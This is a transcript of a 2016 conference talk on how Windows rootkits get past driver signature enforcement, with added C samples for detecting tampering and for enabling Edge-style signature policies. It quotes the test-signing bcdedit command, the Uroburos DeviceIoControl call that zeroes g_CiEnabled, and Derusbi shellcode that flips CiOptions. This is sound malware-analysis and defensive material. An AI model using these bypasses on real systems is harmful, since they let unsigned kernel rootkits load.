Windows Systems & Code Signing Protection by Paul Rascagneres


Transcript of Windows Systems & Code Signing Protection by Paul Rascagneres

Page 1: Windows Systems & Code Signing Protection by Paul Rascagneres

Windows systems & code signing protection


Shakacon – 13-14 July 2016 – Paul Rascagnères - SEKOIA

Windows systems & code signing protection | About me


Paul Rascagnères

Member of the CERT SEKOIA

Malware analysis

Incident Response

Security researcher

Yo-yo player

Offices in Luxembourg & Paris

Located in Luxembourg


Due to questions yesterday:

Geography slide about Luxembourg

Area: 998 sq mi - 2,586 km2

Population: 576,249


Authenticode



The code signing mechanism provided by Microsoft is named Authenticode.

It is based on certificates.

It supports expiration dates, and Microsoft manages a revocation list (for example if a certificate is compromised).


For kernel mode, the driver signature is mandatory since Windows 7 – 64 bits.

For user mode, the binary signature is not mandatory. “As a software publisher, there are two reasons to sign your code: to prove its Integrity and to develop its Reputation” [1].

[1] https://blogs.msdn.microsoft.com/ieinternals/2011/03/22/everything-you-need-to-know-about-authenticode-code-signing/



Kernel space implications



For kernel mode, the driver signature is mandatory since Windows 7 – 64 bits.

Is it the end of rootkits?



I identified 2 ways used by rootkit developers to bypass this protection:

a “low cost” approach

a “high end” approach


“low cost”

For development purposes, Microsoft provides a test mode on Windows systems. A reboot is required to enable this mode:

bcdedit.exe -set TESTSIGNING ON


The “Test Mode” message on the desktop is shown by winlogon.exe (and attackers patch it: a single test in winlogon.exe has to be altered).


“high end”: Uroburos technique

The malware developers used a vulnerability to disable the driver signature enforcement.

CVE-2008-3431: http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability

Vulnerability in VBoxDrv.sys that allows switching an arbitrary kernel memory address to 0.


The overwritten address was g_CiEnabled (Ci stands for Code Integrity).

Before: kd> dq nt!g_cienabled -> fffff800`02e45eb8 00000001

After: kd> dq nt!g_cienabled -> fffff800`02e45eb8 00000000


The effect is to “switch” to test mode without rebooting and without the message on the desktop… but the bcdedit.exe command can still be used to identify that the machine is in test mode ;)


The malware opens the VBoxDrv symlink;

it loads ntoskrnl.exe;

it locates g_CiEnabled;

it uses DeviceIoControl() to switch the arbitrary address to 0:

DeviceIoControl(VBoxDrv, SUP_IOCTL_FAST_DO_NOP, g_CiEnabledAddr, 0, g_CiEnabledAddr, 0, &cb, NULL)

Complete implementation there: http://www.kernelmode.info/forum/viewtopic.php?t=3322&f=11


“high end”: Derusbi technique

The malware developers used a vulnerability to disable the driver signature enforcement.

CVE-2013-3956: https://www.novell.com/support/kb/doc.php?id=7012497

Vulnerability in NICM.SYS that allows code execution in kernel space.


Analysis of the shellcode used during the exploitation:

0:001> g
[...]
String(24,24) at 0000000002c9d230: \Device\Nicm
00000000`02c9d250 00000140
Breakpoint 6 hit
kernel32!DeviceIoControl:
00000000`76e067b4 ff25ce6e0800 jmp qword ptr [kernel32!_imp_DeviceIoControl (00000000`76e8d688)] ds:00000000`76e8d688={KERNELBASE!DeviceIoControl (000007fe`fda8a1e0)}
0:001> db @r8
00000000`0d0d0000 28 00 0d 0d 00 00 00 00-ff eb 45 00 ff ff ff ff (.........E.....
00000000`0d0d0010 08 20 ef 16 f9 33 8e 06-e5 44 0d 0e c2 72 0a 5e . ...3...D...r.^
00000000`0d0d0020 2c 02 44 0d 33 49 ae 72-30 00 0d 0d 00 00 00 00 ,.D.3I.r0.......
00000000`0d0d0030 9a 3f 2f 19 0f 36 81 62-25 14 bf 59 13 3b 9f 7b .?/..6.b%..Y.;.{
00000000`0d0d0040 8d 5b 7f 29 29 3f 98 65-86 bc a2 02 00 f8 ff ff .[.))?.e........
00000000`0d0d0050 48 b8 30 0e e8 00 80 f8-ff ff 8b 18 80 cb 08 89 H.0.............
00000000`0d0d0060 18 c3 cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
00000000`0d0d0070 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................


The 18 bytes starting at offset 0x50 of the buffer above (48 b8 30 0e … 89 18 c3) disassemble to:

$ rasm2 -k windows -b 64 -a x86.udis -D "48b8300ee80080f8ffff8b1880cb088918c3"
0x00000000 10 48b8300ee80080f8ffff  mov rax, 0xfffff88000e80e30
0x0000000a  2 8b18                  mov ebx, [rax]
0x0000000c  3 80cb08                or bl, 0x8
0x0000000f  2 8918                  mov [rax], ebx
0x00000011  1 c3                    ret

kd> !address 0xfffff88000e80e30

[…]

Usage: Module

Base Address: fffff880`00e7b000

End Address: fffff880`00f3b000

Region Size: 00000000`000c0000

VA Type: SystemPTEs

Module name: CI.dll

Module path: [\SystemRoot\system32\CI.dll]


Before: kd> dd 0xfffff88000e80e30 L1 -> fffff880`00e80e30 00000006

After: kd> dd 0xfffff88000e80e30 L1 -> fffff880`00e80e30 0000000e


Why this value? Let’s check CI.dll


From Mateusz ‘j00ru’ Jurczyk’s post [2]:

VOID SepInitializeCodeIntegrity()
{
    DWORD CiOptions;
    g_CiEnabled = FALSE;
    if(!InitIsWinPEMode)
        g_CiEnabled = TRUE;             // code integrity is on unless booting WinPE

    memset(g_CiCallbacks,0,3*sizeof(SIZE_T));
    CiOptions = 4|2;                    // 0x6 by default

    if(KeLoaderBlock)
    {
        if(*(DWORD*)(KeLoaderBlock+84))   // boot options string present
        {
            if(SepIsOptionPresent((KeLoaderBlock+84),L"DISABLE_INTEGRITY_CHECKS"))
                CiOptions = 0;
            if(SepIsOptionPresent((KeLoaderBlock+84),L"TESTSIGNING"))
                CiOptions |= 8;         // 4|2|8 == 0xe
        }
        CiInitialize(CiOptions,(KeLoaderBlock+32),&g_CiCallbacks);
    }
}

[2] https://blogs.msdn.microsoft.com/ieinternals/2011/03/22/everything-you-need-to-know-about-authenticode-code-signing/


Let’s check CI.dll: 0xfffff88000e80e30 == dword_7FF404C5E30

This variable contains the CiOptions flags.


The effect is to “switch” to test mode without rebooting and without the message on the desktop, and the bcdedit.exe command shows that the machine is not in test mode, because the global flag was not modified…
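As an added example, not code from the talk: a consistency check a responder can run over values pulled from a kernel debugger or a memory image, comparing the CiOptions dword in CI.dll and nt!g_CiEnabled with what the boot configuration (bcdedit) implies, using the flag logic of the SepInitializeCodeIntegrity pseudocode above. The function and enum names are mine; the sample values are the ones shown in the kd output on the slides, and the BCD state is constructed.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Flag values as they appear in the SepInitializeCodeIntegrity pseudocode reproduced above. */
#define CI_OPT_DEFAULT      0x6u   /* 4|2, set on every boot */
#define CI_OPT_TESTSIGNING  0x8u   /* ORed in only when the TESTSIGNING boot option is present */

typedef enum {
    CI_CONSISTENT,            /* memory matches the boot configuration */
    CI_TAMPERED_TESTSIGNING,  /* test-signing bit set in memory but absent from the BCD (Derusbi pattern) */
    CI_TAMPERED_DISABLED,     /* code integrity off in memory while the BCD leaves it on (Uroburos pattern) */
    CI_MISMATCH_OTHER         /* some other difference: worth a closer look */
} ci_verdict;

/* CiOptions the kernel computes for a given boot configuration, mirroring the pseudocode's order. */
uint32_t expected_ci_options(bool disable_integrity_checks, bool testsigning)
{
    uint32_t opts = CI_OPT_DEFAULT;                         /* 0x6 by default */
    if (disable_integrity_checks) opts = 0;
    if (testsigning) opts |= CI_OPT_TESTSIGNING;            /* 0x6 -> 0xe */
    return opts;
}

/* Compare the CiOptions dword read from CI.dll with what the BCD (bcdedit /enum) implies. */
ci_verdict check_ci_options(uint32_t observed, bool bcd_disable_integrity_checks, bool bcd_testsigning)
{
    uint32_t expected = expected_ci_options(bcd_disable_integrity_checks, bcd_testsigning);
    if (observed == expected) return CI_CONSISTENT;
    if (!bcd_testsigning && (observed & CI_OPT_TESTSIGNING) &&
        (observed & ~CI_OPT_TESTSIGNING) == expected)
        return CI_TAMPERED_TESTSIGNING;                     /* exactly the 0x6 -> 0xe change the shellcode makes */
    if (observed == 0 && !bcd_disable_integrity_checks) return CI_TAMPERED_DISABLED;
    return CI_MISMATCH_OTHER;
}

/* Compare nt!g_CiEnabled with what SepInitializeCodeIntegrity sets: TRUE unless booting WinPE. */
ci_verdict check_g_ci_enabled(uint32_t observed, bool winpe_boot)
{
    bool expected = !winpe_boot;
    if ((observed != 0) == expected) return CI_CONSISTENT;
    return observed == 0 ? CI_TAMPERED_DISABLED : CI_MISMATCH_OTHER;
}

const char *ci_verdict_name(ci_verdict v)
{
    switch (v) {
    case CI_CONSISTENT:           return "consistent";
    case CI_TAMPERED_TESTSIGNING: return "TAMPERED: test-signing bit set in memory only";
    case CI_TAMPERED_DISABLED:    return "TAMPERED: code integrity disabled in memory only";
    default:                      return "mismatch: investigate";
    }
}

int main(void)
{
    /* Slide values: CiOptions 0x6 before / 0xe after Derusbi, g_CiEnabled 1 before / 0 after Uroburos. */
    printf("CiOptions 0x6: %s\n", ci_verdict_name(check_ci_options(0x6, false, false)));
    printf("CiOptions 0xe: %s\n", ci_verdict_name(check_ci_options(0xe, false, false)));
    printf("g_CiEnabled 0: %s\n", ci_verdict_name(check_g_ci_enabled(0, false)));
    return 0;
}
```

The in-memory values come from a live kd session or a memory dump; the BCD flags come from bcdedit on the same host, so a machine whose bcdedit output says "not in test mode" while CiOptions reads 0xe is flagged.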


“high end”: GrayFish (Equation Group) technique

Sadly I don’t have the samples :’(

Kaspersky report: https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

“To bypass modern OS security mechanisms that block the execution of untrusted code in kernel mode, GrayFish exploits several legitimate drivers, including one from the CloneCD program. This driver (ElbyCDIO.sys) contains a vulnerability which GrayFish exploits to achieve kernel-level code execution”


CVE-2009-0824: code execution in ElbyCDIO.sys (CloneCD)

But no sample hashes in the publication :’(

So I asked, and Kaspersky agreed to share the samples with me…


BUT


Kaspersky promised to provide me the sample in March… in April… in May… in June… and in July…

I’m still waiting :’(


“high end”: HIDEDRV (APT28/Fancy Bear/Sednit/…) technique

I only have the 64-bit .sys file…

No dropper :’(

So I don’t know how the attackers bypass Authenticode :’(

If someone in the room has this dropper, do not hesitate to contact me!!!


“high end”: the same approach

The malware developers use the same approach with different implementations: exploitation of a vulnerability in a legitimate driver.


What about the expiration date?

In kernel space, we can perfectly load a driver signed by an expired certificate…


What about the revocation of certificates?

Who really cares about CRLs?

The certificates of the vulnerable drivers mentioned today are not yet revoked…

It seems to be complicated to systematically revoke certificates once a vulnerability is found (huge side effects).

I’m not even sure that CRL works for kernel space…


Extra trick

The Atheros private certificate leak: https://duo.com/assets/pdf/Dude,_You_Got_Dell_d.pdf


The Atheros private certificate can be used to sign a driver, even if the cert is expired.

On a fresh default Windows install, the driver can perfectly be loaded, even if the cert is expired.


The future?

“Microsoft announced that Windows 10 would not allow installation of drivers unless the driver was signed via the SysDev portal (that is, signed by Microsoft), though this will not require the driver to pass the HLK tests.”

Source: “The NT Insider May-June 2016”

Not implemented for Windows 10 RS2 Preview…


User space (new) implications in Windows 10 TH2


The protected processes

Microsoft implemented a Signing Level in Windows 8.

Alex Ionescu perfectly documented this code signing feature: http://www.alex-ionescu.com/?p=146


No more PROCESS_ALL_ACCESS, PROCESS_CREATE_PROCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION, PROCESS_SET_INFORMATION, PROCESS_SET_QUOTA, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE

Welcome PROCESS_QUERY_LIMITED_INFORMATION

Only available for Microsoft binaries… you cannot create your own protected process :’(


“Protecting Microsoft Edge against binary injection”

Communication by Microsoft: https://blogs.windows.com/msedgedev/2015/11/17/microsoft-edge-module-code-integrity/

“The latest Windows 10 updates strengthen Microsoft Edge with industry-leading enforcement against loading unauthorized DLLs into Microsoft Edge content processes.” (latest == TH2)


Documented vs. undocumented


Mitigation Policy:

typedef enum _PROCESS_MITIGATION_POLICY {
    ProcessDEPPolicy,
    ProcessASLRPolicy,
    ProcessDynamicCodePolicy,
    ProcessStrictHandleCheckPolicy,
    ProcessSystemCallDisablePolicy,
    ProcessMitigationOptionsMask,
    ProcessExtensionPointDisablePolicy,
    ProcessControlFlowGuardPolicy,
    ProcessSignaturePolicy,
    ProcessFontDisablePolicy,
    ProcessImageLoadPolicy,
    MaxProcessMitigationPolicy
} PROCESS_MITIGATION_POLICY, *PPROCESS_MITIGATION_POLICY;


Mitigation Policy:

typedef struct _PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY {
    union {
        DWORD Flags;
        struct {
            DWORD MicrosoftSignedOnly : 1;
            DWORD StoreSignedOnly : 1;
            DWORD MitigationOptIn : 1;
            DWORD ReservedFlags : 29;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY;
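As an added example (not code from the talk or from the SekoiaLab repository), this is how a process can apply the same binary signature policy to itself that Edge content processes use, so that later LoadLibrary() calls only succeed for Microsoft-signed images. The struct, the ProcessSignaturePolicy value and SetProcessMitigationPolicy() are the documented Win32 ones; the helper names are mine, and on non-Windows builds only the flag logic compiles, against a mirror of the struct shown above.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#  ifndef _WIN32_WINNT
#    define _WIN32_WINNT 0x0602          /* SetProcessMitigationPolicy exists since Windows 8 */
#  endif
#  include <windows.h>                   /* real struct and ProcessSignaturePolicy come from winnt.h */
#else
/* Offline mirror of the Windows definitions shown above, so the flag logic builds anywhere. */
typedef uint32_t DWORD;
#  define DUMMYSTRUCTNAME
#  define DUMMYUNIONNAME
typedef struct _PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY {
    union {
        DWORD Flags;
        struct {
            DWORD MicrosoftSignedOnly : 1;
            DWORD StoreSignedOnly : 1;
            DWORD MitigationOptIn : 1;
            DWORD ReservedFlags : 29;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY;
#endif

/* Flags dword for the requested policy: this is the buffer SetProcessMitigationPolicy receives. */
DWORD signature_policy_flags(bool microsoft_signed_only, bool store_signed_only, bool mitigation_opt_in)
{
    PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY pol;
    pol.Flags = 0;
    pol.MicrosoftSignedOnly = microsoft_signed_only ? 1 : 0;
    pol.StoreSignedOnly = store_signed_only ? 1 : 0;
    pol.MitigationOptIn = mitigation_opt_in ? 1 : 0;
    return pol.Flags;
}

/* Decode a Flags dword, e.g. one read back with GetProcessMitigationPolicy, into readable form. */
int describe_signature_policy(DWORD flags, char *out, size_t out_len)
{
    PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY pol;
    pol.Flags = flags;
    return snprintf(out, out_len, "MicrosoftSignedOnly=%u StoreSignedOnly=%u MitigationOptIn=%u Reserved=0x%x",
                    (unsigned)pol.MicrosoftSignedOnly, (unsigned)pol.StoreSignedOnly,
                    (unsigned)pol.MitigationOptIn, (unsigned)pol.ReservedFlags);
}

/* Opt the calling process into MicrosoftSignedOnly. Every image mapped after this call must carry a
   Microsoft signature, so any non-Microsoft DLL the process itself needs must already be loaded. */
bool enable_microsoft_signed_only(void)
{
#ifdef _WIN32
    PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY pol;
    pol.Flags = signature_policy_flags(true, false, false);
    return SetProcessMitigationPolicy(ProcessSignaturePolicy, &pol, sizeof(pol)) != 0;
#else
    return false;                        /* not a Windows build: nothing to apply */
#endif
}
```

Call enable_microsoft_signed_only() early in main(), after the process's own third-party DLLs are loaded, and confirm the setting with GetProcessMitigationPolicy() before relying on it.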


How does it work? During a LoadLibrary() API call:

-> the kernel calls NtCreateSection();
-> MiCreateSection() is called;
-> MiValidateSectionCreate() is called;
-> ci.dll (Code Integrity) is used in order to check signatures.


Is it bulletproof?


For proper .dll injection via LoadLibrary(): YES

For dirty injection (shellcode injection, in-memory patching, …): NO

Code test: https://github.com/SekoiaLab/BinaryInjectionMitigation/


Questions?

or awkward silence?

or applause to wake up your neighbour?
